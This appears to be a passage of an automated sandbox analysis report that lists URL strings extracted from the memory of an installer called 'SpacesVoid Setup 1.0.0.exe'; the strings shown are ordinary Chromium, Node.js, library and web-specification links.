Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547callClearTwiceUsing
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534useSystemMemoryForConstantBuffersCopying
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/705865
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/710443
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/811661
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/848952
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/927119
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/927119..
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/981419
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by/3.0/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.chrome.com/blog/enabling-shared-array-buffer/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.chrome.com/blog/immutable-document-domain/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/cross-origin-isolation/.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developers.google.com/android/guides/setup
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2517672801.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eksempel.dk.Brug
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunk
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-flush
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Cyan4973/xxHash
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Maratyszcza/pthreadpool
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/SeleniumHQ/selenium/tree/trunk
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.border-boxcontent-bo
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WICG/scheduling-apis
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WICG/shared-element-transitions/blob/main/debugging_overflow_on_images.md.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WICG/view-transitions/blob/main/debugging_overflow_on_images.md
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/aawc/unrar.git
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/acornjs/acorn/issues/575
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chalk/supports-color
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/zstd
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/diff-match-patch/tree/master/javascript
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/distributed_point_functions
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/google-api-cpp-client/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/pprof/tree/master/proto
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/private-join-and-compute
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/protobuf
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/re2
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/ruy
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/securemessage
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/sentencepiece
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/shell-encryption
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/ukey2
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/woff2
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/wuffs-mirror-release-c
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/xnnpack
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/heycam/webidl/pull/946.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/intel/libva
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/color-support.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jrmuizel/qcms/tree/v4
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/pump
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35452
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39707
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2568738966.00000000055CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/27791
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/32887
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33515.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34385
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/35941
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38248
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/protocolbuffers/protobuf/blob/master/java/lite.md
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/puppeteer/puppeteer/tree/main/packages/puppeteer-core
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/simplejson/simplejson
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/models
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/tensorflow
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/text.git
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/tflite-support
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/ServiceWorker/issues/1356.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/ServiceWorker/issues/1356.WindowPostMessageOptionstargetOrigin
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/120
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/120Access
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-features
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-featuresDeviceOri
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/wasdk/wasmparser
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/xiph/rnnoise
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.freedesktop.org/xdg/xdgmime
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/LdLk22
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/LdLk22MEDIA_ELEMENT_ERROR:
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/LdLk22Media
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/rStTGz
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/t5IS6M).
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gle/chrome-insecure-origins
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-operations
